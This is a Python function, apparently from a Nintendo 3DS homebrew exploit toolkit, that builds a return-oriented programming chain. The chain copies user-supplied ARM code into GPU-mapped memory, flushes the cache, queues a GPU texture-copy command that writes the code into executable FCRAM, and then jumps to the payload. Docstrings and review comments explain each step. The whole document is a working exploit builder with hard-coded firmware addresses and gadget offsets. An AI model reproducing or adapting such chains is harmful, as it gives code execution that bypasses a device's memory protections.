def main(argv):
	"""Build a ROP chain that stages the ARM code from ``argv[0]`` and write it to ``argv[1]``.

	The chain is assembled sequentially with the module's ``ROP`` helper, so the
	order of the ``r.call``/``r.call_lr``/``r.pop_pc`` statements below *is* the
	semantics: each one appends to the chain.

	Args:
		argv: ``argv[0]`` is the path of the raw ARM code to embed;
			``argv[1]`` is the output path for the generated chain bytes.

	Raises:
		IndexError: if fewer than two paths are supplied.
		IOError/OSError: if the input cannot be read or the output cannot be written.

	Relies on module-level names that are not visible in this listing
	(``struct``, ``ROP``, ``Ref``, ``memcpy``, ``gsp_addr``, ``gsp_code_addr``,
	``gsp_handle``, ``GSPGPU_FlushDataCache``, ``nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue``,
	``svcSleepThread``, ``payload_addr``, ``fcram_code_addr``).  All of the
	literal addresses below are build/firmware specific — presumably one
	target version only; verify before reuse.
	"""
	# Placeholder only; replaced by the file contents on the next line.
	arm_code = ""
	# "rb" so the result is bytes and can be concatenated with struct.pack output.
	with open(argv[0], "rb") as fp:
		arm_code = fp.read()
	
	armCodeSize = len(arm_code)
	# Pad to a 16-byte boundary with a 0xDEADBEEF fill pattern.
	# NOTE(review): when armCodeSize is already a multiple of 16 this appends a
	# full extra 16-byte block (16 - 0); confirm that is intended rather than 0.
	arm_code += struct.pack("<I", 0xDEADBEEF) * (16 - armCodeSize % 16)
	armCodeSize += (16 - armCodeSize % 16)

	# Chain base address (hard-coded; target-specific).
	r = ROP(0x002B0000)
	
	# Copy the embedded ARM code (see the "arm_code" label below) to the
	# GSP-mapped destination; Ref() resolves the label at gen() time — presumably.
	r.call_lr(memcpy, [gsp_addr + gsp_code_addr, Ref("arm_code"), armCodeSize])
	
	# pop {r4-r6, pc}
	# Gadget entered 4 bytes past the symbol; the trailing 3 presumably tells
	# ROP how many registers this epilogue pops — confirm against ROP.call.
	r.call(GSPGPU_FlushDataCache + 4, [gsp_handle, 0xFFFF8001, gsp_addr + gsp_code_addr, armCodeSize], 3)
	
	# ldmfd sp!, {r4-r8, pc}
	# Enqueues the 8-word command block defined at the "gxCommand" label below.
	r.call(nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue + 4, [0x27c580 + 0x58, Ref("gxCommand")], 5)
	# Three extra pop-pc slots; their purpose is not documented here —
	# NOTE(review): confirm they are needed for chain alignment/consumption.
	r.pop_pc()
	r.pop_pc()
	r.pop_pc()
	
	# 0x3B9ACA00 == 1_000_000_000; presumably a 1 s delay expressed in ns.
	r.call_lr(svcSleepThread, [0x3B9ACA00, 0x00000000])
	
	# Jump to payload
	r.i32(0x100000 + payload_addr)
	
	# Data
	# Command block referenced via Ref("gxCommand") above: eight 32-bit words.
	r.label("gxCommand")
	r.i32(0x00000004) # SetTextureCopy
	r.i32(gsp_addr + gsp_code_addr) # source
	r.i32(gsp_addr + fcram_code_addr + payload_addr) # destination
	r.i32(armCodeSize) # size (padded length from above)
	r.i32(0x00000000) # dim in
	r.i32(0x00000000) # dim out
	r.i32(0x00000008) # flags
	r.i32(0x00000000) # unused
	
	# Raw (padded) ARM code, referenced via Ref("arm_code") in the memcpy call.
	r.label("arm_code")
	r.data(arm_code)
	
	# Serialize the chain; gen() presumably resolves labels/Refs to addresses.
	rop = r.gen()
	
	with open(argv[1], "wb") as fl:
		fl.write(rop)